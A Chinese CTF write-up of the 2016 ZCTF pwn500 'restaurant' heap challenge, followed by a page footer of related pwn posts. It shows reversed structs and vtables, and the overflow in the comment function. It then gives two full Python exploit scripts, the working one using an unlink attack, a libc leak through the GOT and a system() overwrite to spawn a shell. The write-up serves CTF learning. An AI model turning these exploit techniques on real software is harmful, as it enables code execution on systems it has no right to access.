pxx_error
pxx_error

zctf-pwn500-restaurant-write-up

2016-zctf-pwn500-restaurant-write-up(中国菜馆)

花了六七个小时做这个题目,还是没搞出来。。。。。。好菜。。。。

这道题是用c++写的

结构体有以下几个:

00000000
00000000 struct_info     struc ; (sizeof=0x90, align=0x8)
00000000 name            db 16 dup(?)
00000010 country_name    db 16 dup(?)
00000020 money           dq ?
00000028 age             dq ?                    ; offset
00000030 show_exit_info_func dq ?
00000038 order_ptr       dq 3 dup(?)
00000050 addition_comment db 64 dup(?)
00000090 struct_info     ends
00000090
00000000 ; ---------------------------------------------------------------------------
00000000
00000000 struct_type1    struc ; (sizeof=0x50, align=0x8)
00000000 vitable         dq ?                    ; offset
00000008 taste_comment   db 32 dup(?)
00000028 message         db 16 dup(?)
00000038 price           dq ?
00000040 look_comment    db 16 dup(?)
00000050 struct_type1    ends
00000050
00000000 ; ---------------------------------------------------------------------------
00000000
00000000 struct_type2    struc ; (sizeof=0x88, align=0x8)
00000000 vitable         dq ?
00000008 taste_comment   db 32 dup(?)
00000028 message         db 32 dup(?)
00000048 price           dq ?
00000050 look_comment    db 56 dup(?)
00000088 struct_type2    ends
00000088
00000000 ; ---------------------------------------------------------------------------
00000000
00000000 struct_type3    struc ; (sizeof=0x80, align=0x8)
00000000 vitable         dq ?
00000008 taste_comment   db 32 dup(?)
00000028 message         db 48 dup(?)
00000058 price           dq ?
00000060 look_comment    db 32 dup(?)
00000080 struct_type3    ends

其实漏洞还是很明显的,

各个类型的虚函数表大概如下:

.rodata:0000000000404770 type1_404770    dq offset show_0_4028D4 ; DATA XREF: staple_food1_init_402860+1Co
.rodata:0000000000404770                                         ; init_403B62+10o
.rodata:0000000000404778                 dq offset get_price_8_4029A4
.rodata:0000000000404780                 dq offset append_16_4029B6
.rodata:0000000000404788                 dq offset copy_24_4029E0
.rodata:0000000000404790                 dq offset get_look_comment_32_4028B2
.rodata:0000000000404798                 dq offset get_max_comment_szie_40_4028C4
.rodata:00000000004047A0                 dq offset init_403B62
.rodata:00000000004047A8                 dq offset delete_56_403B9C

就是在添加评论的时候,外观评价上有个8(最多9个)字节的溢出,触发情况如下:

首先评论的时候直接是copy函数,第二次更改的时候,是在“Changed”后面append上评论的字符串,而每次get_max_comment_size的时候,大小都是固定的,所以会溢出

如下:

      fgets(s, len + 2, stdin);
      s[len + 2] = '\n';
      if ( (signed int)strlen(s) > len )
      {
        LODWORD(v4) = std::operator<<>(6316416LL, 0x403F6ELL);// 0x403F6EL  Your comment is too long!
        std::ostream::operator<<(v4, 0x400ED0LL);
        exit(1);
      }
      LODWORD(v5) = (*(int (__fastcall **)(_QWORD))(**(_QWORD **)&info->name[8 * (i + 6LL) + 8] + 32LL))(*(_QWORD *)&info->name[8 * (i + 6LL) + 8]);
      if ( *(_BYTE *)v5 )
      {
        LODWORD(v6) = (*(int (__fastcall **)(_QWORD))(**(_QWORD **)&info->name[8 * (i + 6LL) + 8] + 32LL))(*(_QWORD *)&info->name[8 * (i + 6LL) + 8]);
        *(_QWORD *)v6 = ':degnahC';
        *(_BYTE *)(v6 + 8) = 0;
      }
      else
      {
        LODWORD(v7) = (*(int (__fastcall **)(_QWORD))(**(_QWORD **)&info->name[8 * (i + 6LL) + 8] + 32LL))(*(_QWORD *)&info->name[8 * (i + 6LL) + 8]);
        *(_BYTE *)v7 = 0;
      }
      (*(void (__fastcall **)(_QWORD, char *))(**(_QWORD **)&info->name[8 * (i + 6LL) + 8] + 16LL))(
        *(_QWORD *)&info->name[8 * (i + 6LL) + 8],
        s);
      v14 = 1;

不成功脚本:
当时最开始做的时候,是采用off by one将后面的节点进行释放,达到两个菜单的堆块重叠,最终改写另外一个菜单的虚表,最终成功的到达了system,但是没法传参数,思路卡住了。。。。。。,由于没成功,就不多介绍了。。。

__author__ = "pxx"
from zio import *
from pwn import *
#ip = 218.29.102.109
target = "./restaurant"
#target = ("115.28.27.103", 44444)

def get_io(target):
	r_m = COLORED(RAW, "green")
	w_m = COLORED(RAW, "blue")
	io = zio(target, timeout = 9999, print_read = r_m, print_write = w_m)
	return  io 

def take_staple_food(io):
	io.read_until("8. Finish your order.\n")
	io.writeline("1")
def take_entree(io):
	io.read_until("8. Finish your order.\n")
	io.writeline("2")
def take_soup(io):
	io.read_until("8. Finish your order.\n")
	io.writeline("3")

def add_comments(io, order, look, taste):
	io.read_until("8. Finish your order.\n")
	io.writeline("7")
	io.read_until("Which order do you want to make a comment(1,2 or 3 depend on menu): ")
	io.writeline(str(order))
	io.read_until("How does this dish look: \n")
	io.writeline(look)
	io.read_until("How does this dish taste: \n")
	io.writeline(taste)

def cancel_order(io, order):
	io.read_until("8. Finish your order.\n")
	io.writeline("5")
	io.read_until("Which order do you want to cancel(1,2 or 3 depend on menu): ")
	io.writeline(str(order))

def show_list(io):
	io.read_until("8. Finish your order.\n")
	io.writeline("4")

def show_account(io):
	io.read_until("8. Finish your order.\n")
	io.writeline("6")

map_info = {}
map_info["Steamed rice"] = 1 #0x50 
map_info["Pan-Fried Bun Stuffed with Pork"] = 2 #0x88
map_info["Jiaozi Stuffed with Pork and Chinese Cabbage"] = 3 #0x80

map_info["Kun Pao Chicken"] = 1 #0x50 
map_info["Scrambled  Egg  with Tomato"] = 2 #0x88
map_info["Shredded Pork with Vegetables, Sichuan Style"] = 3 #0x80

map_info["Scallop Soup"] = 1 #0x50 
map_info["Minced Beef and Tofu Soup"] = 2 #0x88
map_info["Shredded Pork with Pickled Vegetable Soup"] = 3 #0x80

def pwn(io):

	printf_got = 0x0000000000606018
	io.read_until("Please enter your name: ")

	show_info_addr = 0x40261e
	name = l64(show_info_addr)
	io.writeline(name)

	io.read_until(", you are the luckey ")
	data = io.read_until("th guest")[:-8]
	info_addr = int(data)
	print "info_addr:", hex(info_addr)

	io.read_until("Are you from China? (y/n) ")
	io.writeline("n")

	io.read_until("Dear foreigner, please enter your country: ")
	atoi_got = 0x00000000006060a0
	country = 'pxx\x00'
	country = country.ljust(16, 'a')
	country += l64(0x999999)[:4]

	io.writeline(country)
	io.read_until("How old are you: ")

	age = printf_got
	io.writeline(str(age))

	take_staple_food(io)
	take_entree(io)
	take_soup(io)

	show_list(io)

	target_order = 1
	target_type = -1

	result = []
	for i in range(1, 4):
		io.read_until("Order %d : \n"%(i))
		io.read_until("name: ")
		name = io.read_until("\n")[:-1]

		print map_info[name], name
		result.append(map_info[name])

		if i == 1:
			target_type = map_info[name]

	if result[0] != 2 or result[1] != 1:
		io.close()
		print "first node not match"
		return False

	size = 0

	size_map = {}
	size_map[1] = 0x50
	size_map[2] = 0x88
	size_map[3] = 0x80

	size2_map = {}
	size2_map[1] = 16
	size2_map[2] = 56
	size2_map[3] = 32

	look = 'aaa'
	taste = 'a' * 8
	add_comments(io, target_order, look, taste)

	size2 = 0x10
	if result[2] == 2:
		size2 = 0x08

	look = 'aaa\x00'
	look = look.ljust(size2_map[2] - 8, 'a')
	look += l64(size_map[result[1]] + 0x10 + size2 + size_map[result[2]] + 1)
	taste = 'a' * 8
	add_comments(io, target_order, look, taste)

	cancel_order(io, 2)

	take_entree(io)

	show_list(io)

	result2 = []
	for i in range(1, 3):
		io.read_until("Order %d : \n"%(i))
		io.read_until("name: ")
		name = io.read_until("\n")[:-1]

		print map_info[name], name
		result2.append(map_info[name])

	#io.read_until()
	if result2[1] == 1:
		io.close()
		print "second node not match"
		return False


	io.gdb_hint()
	if result2[1] == 2:
		look = 'aaa'
		taste = 'bbb'
		add_comments(io, 2, look, taste)

		look = 'a' * (0x10 - 8)
		look += l64(info_addr)
		look += 'a' * 32
		look += l64(printf_got)[:6]
		taste = 'a' * 8
		add_comments(io, 2, look, taste)
	else:
		#look = 'a' * 0x10
		look += l64(info_addr)
		look += 'a' * 32
		look += l32(printf_got)

		taste = 'a' * 8
		add_comments(io, 2, look, taste)

	show_list(io)
	io.read_until("Order 3 : \n")
	io.read_until("Your age: ")
	data = io.read_until("\n")[:-1]

	target_addr = int(data)
	print "target_addr:", hex(target_addr)
	#data = io.read_until("Now ple1ase take a order:")[:-len("Now please take a order:")]
	#print [c for c in  data]

	#elf_info = ELF("./libc-2.19.so")
	elf_info = ELF("./libc.so.6")
	target_offset = elf_info.symbols["printf"]
	system_offset = elf_info.symbols["system"]

	print "info_addr:", hex(info_addr)

	buff_addr = l64(info_addr + 0x90 + 0x20 + 0x10 + 0x88 + 0x08 + 0x50 + 0x10 + 0x10)

	libc_base = target_addr - target_offset
	system_addr = libc_base + system_offset

	data = l64(system_addr)
	look = 'a' * (0x10 - 8)
	look += buff_addr
	look += "/bin/sh;" + data + ";/bin/sh;"
	show_list(io)
	taste = 'a' * 8
	add_comments(io, 2, look, taste)

	#delete_note(io, 6)
	io.interact()
	return True

while True:
	io = get_io(target)
	if pwn(io) == True:
		break


 
  
成功脚本:
 
  
利用坑点:(可能我写利用不太成熟,觉得限制太多。。。菜到家了)
 
  
1.  利用的时候几乎只能是用类型2进行,因为:
 
  
另外两种类型:0x50,0x80,在堆使用的时候,溢出的8字节刚好把多余的pre_size占用,只能覆盖到size的最高位(感觉这样难利用),
 
  
所以选择0x88大小的size,这样pre_size在自己的buff内部,可以填写,而溢出的8字节,刚好可以覆盖后面堆块的size,最终达到unlink利用。
 
  
2. 由于每次的类型是随机的,感觉情况好多,但是后来发现固定死一种比较好求解,,而且貌似其他会发生异常,主要原因在于:
 
  
每次添加评论的时候,都会调用一下虚表中的get_max_comment_size,unlink改写后,order_ptr 所向的地方,会被改成&addr-3,这个位置要不就是存money的地方,要不就是前面的某个位置,我最后改成的就是存放money的位置(money的值就是虚表的地址),而money是我第一次溢出改写后,几乎就只与我订单有关系了,如果随机,那么虚表就没法确定,导致调用异常,最后我订两个菜单(类型2, 类型2),然后在利用age泄露地址,利用退出时回显的消息来改成system,达到获取shell
 
  
最后脚本如下:
 
  
 
  
__author__ = "pxx"
from zio import *
from pwn import *
#ip = 218.29.102.109
target = "./restaurant"
#target = ("115.28.27.103", 44444)

def get_io(target):
	r_m = COLORED(RAW, "green")
	w_m = COLORED(RAW, "blue")
	io = zio(target, timeout = 9999, print_read = r_m, print_write = w_m)
	return  io 

def take_staple_food(io):
	io.read_until("8. Finish your order.\n")
	io.writeline("1")
def take_entree(io):
	io.read_until("8. Finish your order.\n")
	io.writeline("2")
def take_soup(io):
	io.read_until("8. Finish your order.\n")
	io.writeline("3")

def add_comments(io, order, look, taste):
	io.read_until("8. Finish your order.\n")
	io.writeline("7")
	io.read_until("Which order do you want to make a comment(1,2 or 3 depend on menu): ")
	io.writeline(str(order))
	io.read_until("How does this dish look: \n")
	io.writeline(look)
	io.read_until("How does this dish taste: \n")
	io.writeline(taste)

def cancel_order(io, order):
	io.read_until("8. Finish your order.\n")
	io.writeline("5")
	io.read_until("Which order do you want to cancel(1,2 or 3 depend on menu): ")
	io.writeline(str(order))

def show_list(io):
	io.read_until("8. Finish your order.\n")
	io.writeline("4")

def show_account(io):
	io.read_until("8. Finish your order.\n")
	io.writeline("6")

def finish_order(io):
	io.read_until("8. Finish your order.\n")
	io.writeline("8")


map_info = {}
map_info["Steamed rice"] = 1 #0x50 
map_info["Pan-Fried Bun Stuffed with Pork"] = 2 #0x88
map_info["Jiaozi Stuffed with Pork and Chinese Cabbage"] = 3 #0x80

map_info["Kun Pao Chicken"] = 1 #0x50 
map_info["Scrambled  Egg  with Tomato"] = 2 #0x88
map_info["Shredded Pork with Vegetables, Sichuan Style"] = 3 #0x80

map_info["Scallop Soup"] = 1 #0x50 
map_info["Minced Beef and Tofu Soup"] = 2 #0x88
map_info["Shredded Pork with Pickled Vegetable Soup"] = 3 #0x80

def pwn(io):

	printf_got = 0x0000000000606018
	io.read_until("Please enter your name: ")

	show_info_addr = 0x40261e
	name = "/bin/sh;"
	io.writeline(name)

	io.read_until(", you are the luckey ")
	data = io.read_until("th guest")[:-8]
	info_addr = int(data)

	io.read_until("Are you from China? (y/n) ")
	io.writeline("n")

	io.read_until("Dear foreigner, please enter your country: ")
	atoi_got = 0x00000000006060a0
	country = 'pxx\x00'
	country = country.ljust(16, 'a')

	type_2_virt = 0x404710 
	country += l64(type_2_virt + 2 + 10)[:4]

	io.writeline(country)
	io.read_until("How old are you: ")

	age = printf_got
	io.writeline(str(age))

	take_staple_food(io)
	take_entree(io)
	#take_soup(io)

	show_list(io)

	result = []
	for i in range(1, 3):
		io.read_until("Order %d : \n"%(i))
		io.read_until("name: ")
		name = io.read_until("\n")[:-1]

		print map_info[name], name
		result.append(map_info[name])

	if result != [2, 2]:#
		print "not pass this"
		#raw_input()
		io.close()
		return False
	size_map = {}
	size_map[1] = 0x50
	size_map[2] = 0x88
	size_map[3] = 0x80

	heap_size_map = {}
	heap_size_map[1] = 0x60
	heap_size_map[2] = 0x90
	heap_size_map[3] = 0x90

	size2_map = {}
	size2_map[1] = 16
	size2_map[2] = 56
	size2_map[3] = 32

	target_order = 0
	node_addr = 0
		
	target_order = 1
	node_addr  = info_addr + 0x38

	look = 'aaa'
	taste = 'a' * 8
	add_comments(io, target_order, look, taste)

	#useful_code --- begin
	#prepare args
	arch_bytes = 8
	heap_buff_size = 0x80 #0x78 #0x80
	#node1_addr = &p0
	node1_addr = node_addr
	pack_fun = l64

	heap_node_size = heap_buff_size + 2 * arch_bytes #0x88

	p0 = ""#pack_fun(0x0)
	p1 = pack_fun(heap_buff_size + 0x01)
	p2 = pack_fun(node1_addr - 3 * arch_bytes)
	p3 = pack_fun(node1_addr - 2 * arch_bytes)
	#p[2]=p-3
	#p[3]=p-2
	#node1_addr = &node1_addr - 3

	node2_pre_size = pack_fun(heap_buff_size)
	#node2_size = pack_fun(heap_node_size)
	#data1 = p0 + p1 + p2 + p3 + "".ljust(heap_buff_size - 4 * arch_bytes, '1') + node2_pre_size + node2_size
	data1 = p0 + p1 + p2 + p3
	node2_size = pack_fun(heap_size_map[result[target_order - 1 + 1]])
	data2 = node2_pre_size + node2_size
	#useful_code --- end

	look = 'a' * (56 - 8 - 8) + data2
	taste = data1
	add_comments(io, target_order, look, taste)

	print "next_type:", result[target_order - 1 + 1]
	print "next_size:", hex(heap_size_map[result[target_order - 1 + 1]])
	cancel_order(io, target_order + 1)

	print "info_addr:", hex(info_addr)
	io.gdb_hint()
	look = ''
	taste = ''
	taste += l64(printf_got) #age

	add_comments(io, target_order, look, taste)
	show_account(io)
	io.read_until("Your age: ")
	data = io.read_until("\n")[:-1]

	printf_addr = int(data)
	print "printf_addr:", hex(printf_addr)
	#data = io.read_until("Now ple1ase take a order:")[:-len("Now please take a order:")]
	#print [c for c in  data]

	#elf_info = ELF("./libc-2.19.so")
	elf_info = ELF("./libc.so.6")
	target_offset = elf_info.symbols["printf"]
	system_offset = elf_info.symbols["system"]

	libc_base = printf_addr - target_offset
	system_addr = libc_base + system_offset

	look = ''
	taste = ''
	taste += l64(printf_got) #age
	taste += l64(system_addr) #show_exit_info
	add_comments(io, target_order, look, taste)

	finish_order(io)

	io.read_until("3.Just so so!\n")
	io.writeline("3")

	io.interact()
	return True

while True:
	io = get_io(target)
	if pwn(io) == True:
		break
 
  
 附张成功图 
  
 
  
zctf-pwn500-restaurant-write-up_第1张图片
 
 
 


                            

                        

                    

                    
                    

                    
                    
                    

                

                

                    
                

            

        

    

    

        
你可能感兴趣的:(pwn)

        

            

                
    
                    
  • hackcon ctf 2018 | pwn wp
                        fantasy_learner

                        
    BOF漏洞点:栈溢出利用过程栈溢出跳转callMeMaybe函数获得flagexpSheSellsSeaShells90流程分析:给出了输入的栈地址有一个栈溢出点没有nx利用过程:根据以上三点,得出可以使用ret2shellcode使用shellcraft生成shellcode利用栈溢出,输入并跳转到shellcodeexpSimpleYetElegent150这道题目做了最久,卡在了能否根据_d
    
                    
    • 
                    
  • BUUCTF 2021-10-4 Pwn
                        Ch1lkat
BUUCTFPwnlinuxpwn
                        
    文章目录保持手感echo分析EXPPwnme1分析EXPwdb_2018_1st_babyheap分析EXPFSOPhouseoforange_hitcon_2016分析前置知识House_of_orangeFSOPEXPzctf_2016_note3分析EXPgyctf_2020_document分析EXP动态调试复现护网杯_gettingstart分析EXPpicoctf_2018_buffe
    
                    
    • 
                    
  • pwn学习笔记(8)--初识Pwn沙箱
                        晓幂
Pwn学习笔记
                        
    初识Pwn沙箱沙箱机制,英文sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。安全计算模式seccomp(SecureComputingMode)在Linux2.6.10之后引入到kernel的特性,可用其实现一个沙箱环境。使用seccomp模式可以定义系统调用白名单和
    
                    
    • 
                    
  • pwn学习笔记(9)-中级ROP--ret2csu
                        晓幂
Pwn学习笔记
                        
    pwn学习笔记(9)-中级ROP–ret2csu前置知识首先是64位文件的传参方式:前六个参数是从左到右放入寄存器:rdi、rsi、rdx、rcx、r8、r9,之后的通过栈传参。比如:传参函数大于7个:H(a,b,c,d,e,f,g,h)a->%rdi、b->%rsi、c->%rdx、d->%rcx、e->%r8、f->%r9h->(%esp)g->(%esp)callH先看看如下代码:#incl
    
                    
    • 
                    
  • OVS主线流程之ovs-vswitchd主体结构分析
                        大空新一
网络OVS
                        
    OVS是openvirtualswitch的简称,是现在广泛使用的软件实现的虚拟网络交换机。各大云厂商普遍使用OVS来实现自身的虚拟网络,各厂商会根据自身需要加以修改使之符合自身需求,DPU中也使用OVS来实现流表的offload。OVS中的流表基于多级结构,与用户强相关的是opwnflow,下发的流表称为emcflow。OVS一般存在两种运行模式,内核模式和DPDK模式。内核模式下存在一个dat
    
                    
    • 
                    
  • 重头开始嵌入式第二十一天(Linux系统编程 文件相关函数)
                        FLPGYH
vimlinuxc语言
                        
    目录1.getpwuid2.getpwnam3.getgrgid4.symlink在Linux和类Unix系统中,创建软链接(符号链接)的常用指令是ln-s。5.remove6.rename7.link8.truncate9.perror10.strerror11.error1.makefile2.gdbstrtok1.getpwuidgetpwuid函数是C语言标准库中的一个函数,用于通过用户I
    
                    
    • 
                    
  • 2022羊城杯pwn wp
                        Loτυs
wppwn
                        
    YCBSQL远程是上传一个sql文件,题目提示用nc带出flag。优先考虑sqlite自带的.system函数(抱着试一试的想法),然后找web手要了个vps监听,莫名其妙就出了。sql文件内容:.systemnc1.117.171.2489997b->c->dunlink之后成为a->c->db->c->d不过此时b->c->d的nodenum为1,因此不好操作,唯一好利用的点就是通过delet
    
                    
    • 
                    
  • 安恒杯2018-pwn-over
                        Sadmess

                        
    framefaking正如这个技巧名字所说的那样,这个技巧就是构造一个虚假的栈帧来控制程序的执行流。原理概括地讲,我们在之前讲的栈溢出不外乎两种方式控制程序EIP控制程序EBP其最终都是控制程序的执行流。在framefaking中,我们所利用的技巧便是同时控制EBP与EIP,这样我们在控制程序执行流的同时,也改变程序栈帧的位置。一般来说其payload如下bufferpadding|fakeebp
    
                    
    • 
                    
  • pwn学习笔记(4)ret2libc
                        晓幂
学习笔记
                        
    pwn学习笔记(4)静态链接:静态链接是由链接器在链接时将库的内容加入到可执行程序中的做法。链接器是一个独立程序,将一个或多个库或目标文件(先前由编译器或汇编器生成)链接到一块生成可执行程序。这里的库指的是静态链接库,Windows下以.lib为后缀,Linux下以.a为后缀。也就是说将静态链接库中的所有的函数都写入这个ELF文件中,所以会造成该二进制文件极为庞大,因此也会存在很多的可供利用来re
    
                    
    • 
                    
  • HGAME 2024 WEEK1 WP
                        是Mumuzi
ctf信息安全
                        
    文章目录WEBezHTTPBypassitSelectCourses2048*16jhatREezASMezPYCezUPXezIDAPWNEzSignInCRYPTO奇怪的图片ezRSAezMathezPRNGMISCSignIn来自星尘的问候simple_attack希儿希儿希尔签到放假比较闲,打打比赛WEBezHTTP来自vidar.club、UA要求阿巴阿巴阿巴、来自本地(提示不是XFF,
    
                    
    • 
                    
  • pwnable.kr解题write up —— Toddler's Bottle(一)
                        captain_hwz
securityCTFsecurity
                        
    1.fd#include#includecharbuf[32];intmain(intargc,char*argv[],char*envp[]){if(argcunsignedlonghashcode=0x21DD09EC;unsignedlongcheck_password(constchar*p){int*ip=(int*)p;inti;intres=0;for(i=0;i#includevo
    
                    
    • 
                    
  • pwnable.kr解题write up —— Toddler's Bottle(二)
                        captain_hwz
securityCTFsecurity
                        
    9.mistake#include#include#definePW_LEN10#defineXORKEY1voidxor(char*s,intlen){inti;for(i=0;i0)){printf("readerror\n");close(fd);return0;}charpw_buf2[PW_LEN+1];printf("inputpassword:");scanf("%10s",pw_b
    
                    
    • 
                    
  • pwn旅行之[WUSTCTF 2020]getshell2(一些小知识)
                        晓幂
安全
                        
    题目分析1首先打开这个题目的链接的时候,看到了ret2syscall,以为是一个纯正的syscall的题,结果,做的时候发现这个题的危险函数限制的字符串个数不足以写入syscall需要的所有地址,所以,这里参考dalao们的方法,/做出了这道题,这里记录一下。首先,checksec看一下这个题目的保护以及架构:是一个32位小端序程序,开了栈不可执行的保护,所以初步判断,stack的ret2shel
    
                    
    • 
                    
  • pwn学习笔记(2)ret_2_text_or_shellcode
                        晓幂
学习笔记
                        
    pwn学习笔记(2)1.三种常见的寄存器:ax寄存器:通用寄存器,可用于存放多种数据bp寄存器:存放的是栈帧的栈底地址sp寄存器:存放的是栈顶的地址2.栈帧与栈工作的简介:栈帧是存储函数的一些信息的地方,栈帧存储有函数的局部变量,传递给子函数的实际参数,父函数的地址以及上一个栈帧栈底的地址,大致情况如下:在函数调用的过程中,首先会讲bp寄存器的值进行压栈,以方便在恢复的时候恢复栈底寄存器的值,再之
    
                    
    • 
                    
  • pwn学习笔记(3)ret2syscall
                        晓幂
学习笔记
                        
    pwn学习笔记(3)ROP原理:ROP(ReturnOrientedProgramming)返回导向编程,主要思想是通过在程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。栈溢出–ret2syscall:1.系统调用:对于一个已经存在于标准库中的函数,例如printf(),我们编写某个程序的时候,这个函数仅仅只用了printf(参数);这么一行,但是,其工作
    
                    
    • 
                    
  • 从零开始学howtoheap:解题西湖论剑Storm_note
                        网络安全我来了
逆向二进制Re网络安全系统安全安全安全架构
                        
    how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。环境可参见从零开始配置pwn环境:从零开始配置pwn环境:从零开始配置pwn环境:优化pwn虚拟机配置支持libc等指令-CSDN博客1.题目信息https://github.com/ble55ing/ctfpwn/blob/master/pwnable/ctf/x64/Sto
    
                    
    • 
                    
  • 从零开始学howtoheap:理解fastbins的unsorted bin攻击
                        网络安全我来了
网络安全安全系统安全安全架构
                        
    how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。环境可参见从零开始配置pwn环境:从零开始配置pwn环境:从零开始配置pwn环境:优化pwn虚拟机配置支持libc等指令-CSDN博客1.fastbins的unsorted_bin攻击unsortedbin攻击通常是为更进一步的攻击做准备的,我们知道unsortedbin是一个
    
                    
    • 
                    
  • 从零开始学howtoheap:理解fastbins的large_bin攻击
                        网络安全我来了
网络安全系统安全安全安全架构
                        
    how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。环境可参见从零开始配置pwn环境:从零开始配置pwn环境:从零开始配置pwn环境:优化pwn虚拟机配置支持libc等指令-CSDN博客1.fastbins的large_bin攻击根据原文描述跟unsortedbinattack实现的功能差不多https://blog.csdn.
    
                    
    • 
                    
  • 从零开始学howtoheap:fastbins的house_of_spirit攻击3
                        网络安全我来了
网络安全安全安全架构系统安全
                        
    how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。环境可参见从零开始配置pwn环境:从零开始配置pwn环境:从零开始配置pwn环境:优化pwn虚拟机配置支持libc等指令-CSDN博客1.fastbins的house_of_spirit攻击house_of_spirit是一种fastbins攻击方法,通过构造fakechunk
    
                    
    • 
                    
  • Pwntools 2022简明手册
                        ZERO-A-ONE
pwn安全
                        
    Author:ZERO-A-ONEDate:2022-02-24本文翻译自:https://github.com/Gallopsled/pwntools-tutorial,主要是考虑到目前中文互联网中关于系统介绍pwntools使用方法的文章都比较老和杂乱,且转换为Python3后又有许多零零散散的问题,看到这个仓库中包含了很多使用技巧和调试问题的解决方案,感到可以翻译一下这个资源库包含了一些开始
    
                    
    • 
                    
  • 自动化AD域枚举和漏洞检测脚本
                        网络安全进阶
渗透测试工具自动化运维网络安全系统安全web安全
                        
    linWinPwn是一个bash脚本,可自动执行许多ActiveDirectory枚举和漏洞检查。该脚本基于很多现有工具实现其功能,其中包括:impacket、bloodhound、netexec、enum4linux-ng、ldapdomaindump、lsassy、smbmap、kerbrute、adidnsdump、certipy、silenthound等。当你只能在有限的时间内访问Acti
    
                    
    • 
                    
  • 从零开始学howtoheap:fastbins的house_of_spirit攻击1
                        网络安全我来了
逆向二进制Re网络安全安全系统安全
                        
    how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。环境可参见从零开始配置pwn环境:优化pwn虚拟机配置支持libc等指令-CSDN博客1.fastbins的house_of_spirit攻击house_of_spirit是一种fastbins攻击方法,通过构造fakechunk,然后将其free掉,就可以在下一次malloc
    
                    
    • 
                    
  • 从零开始学howtoheap:fastbins的double-free攻击实操3
                        网络安全我来了
逆向二进制Re网络安全安全系统安全安全架构
                        
    how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。环境可参见从零开始配置pwn环境:优化pwn虚拟机配置支持libc等指令-CSDN博客1.fastbins的double-free攻击这个程序展示了怎样利用free改写全局指针chunk0_ptr达到任意内存写的目的,即unsafeunlink。2.unsafeunlink程序
    
                    
    • 
                    
  • 从零开始学howtoheap:fastbins的house_of_spirit攻击2
                        网络安全我来了
逆向二进制Re网络安全系统安全安全
                        
    how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。环境可参见从零开始配置pwn环境:从零开始配置pwn环境:优化pwn虚拟机配置支持libc等指令-CSDN博客1.fastbins的house_of_spirit攻击house_of_spirit是一种fastbins攻击方法,通过构造fakechunk,然后将其free掉,就
    
                    
    • 
                    
  • [BUUCTF]-PWN:mrctf2020_easy_equation解析
                        Clxhzg
PWN网络安全安全
                        
    查看保护再看ida很明了,题目就是让我们用格式化字符串漏洞修改judge的值(可以用python脚本进行计算,最终算出来得2)使等式成立,然后getshell。虽然操作比较简单,但我还是列出了几种方法解法一:frompwnimport*context(log_level='debug')p=process('./equation')judge=0x60105Cpayload=b'bb'+b'%9$
    
                    
    • 
                    
  • 03_when_did_you_born
                        Zero_0_0

                        
    frompwnimport*##p=process('./when_did_you_born')p=remote("111.198.29.45","30787")p.recvuntil("?")p.sendline("1998")p.recvuntil("Name?")payload='A'*8payload+=p64(1926)p.sendline(payload)p.interactive()
    
                    
    • 
                    
  • [BUUTF]-PWN:wdb2018_guess解析
                        Clxhzg
前端linux数据库网络安全安全
                        
    查看保护查看ida这道题并不复杂,只是要注意一点细节完整exp:frompwnimport*fromLibcSearcherimport*p=process('./guess')p=remote('node5.buuoj.cn',28068)puts_got=0x602020payload=b'a'*0x128+p64(puts_got)p.sendlineafter(b'Pleasetypeyo
    
                    
    • 
                    
  • 2023全国大学生信息安全竞赛(ciscn)初赛题解
                        Real返璞归真
CTF网络安全CTFCTF竞赛
                        
    文章目录战队信息安全知识Misc签到卡国粹被加密的生产流量pyshellWebunzipdumpitCyrpto基于国密SM2算法的密钥密文分发可信度量Sign_in_passwdPwn烧烤摊儿funcanaryShellWeGoReezbytebabyRE战队信息安全知识甚至不用看视频,百度就有答案。除了那个最新的美国时政,其它的ChatGPT就能回答。Misc签到卡关注公众号,根据提示,直接p
    
                    
    • 
                    
  • 2023上海市大学生网络安全大赛—ssql题解
                        Real返璞归真
程序人生
                        
    前言上海市大学生网络安全大赛的一道pwn题目,题目用了双向链表(猜到是Unlink漏洞)。还算比较简单,主要是分析代码比较复杂。分析完后漏洞限制条件少,题目给了libc2.31,利用比较灵活。这题白天解比较少,临近比赛结束的时候很多队就做出来了,估计师傅们都花时间在逆向分析上了。题目应该还是主要考察逆向分析和Unlink的理解,不能直接套模板。这里详细写一下分析步骤。题目使用off-by-null
    
                    
    • 
                    
  • 从零开始学howtoheap:fastbins的double-free攻击实操2
                        网络安全我来了
逆向二进制Re网络安全安全安全架构
                        
    how2heap是由shellphish团队制作的堆利用教程,介绍了多种堆利用技术,后续系列实验我们就通过这个教程来学习。环境可参见从零开始配置pwn环境:优化pwn虚拟机配置支持libc等指令-CSDN博客1.fastbins的double-free攻击下面的程序展示了fastbins的double-free攻击,可以泄露出一块已经被分配的内存指针。fastbins可以看成一个后进先出的栈,使用
    
                    
    • 
                                
  • linux系统服务器下jsp传参数乱码
                                    3213213333332132
javajsplinuxwindowsxml
                                    
    在一次解决乱码问题中, 发现jsp在windows下用js原生的方法进行编码没有问题,但是到了linux下就有问题, escape,encodeURI,encodeURIComponent等都解决不了问题 
但是我想了下既然原生的方法不行,我用el标签的方式对中文参数进行加密解密总该可以吧。于是用了java的java.net.URLDecoder,结果还是乱码,最后在绝望之际,用了下面的方法解决了
    
                                
    • 
                                
  • Spring 注解区别以及应用
                                    BlueSkator
spring
                                    
    1. @Autowired 
@Autowired是根据类型进行自动装配的。如果当Spring上下文中存在不止一个UserDao类型的bean,或者不存在UserDao类型的bean,会抛出 BeanCreationException异常,这时可以通过在该属性上再加一个@Qualifier注解来声明唯一的id解决问题。 
  
2. @Qualifier 
当spring中存在至少一个匹
    
                                
    • 
                                
  • printf和sprintf的应用
                                    dcj3sjt126com
PHPsprintfprintf
                                    
    <?php
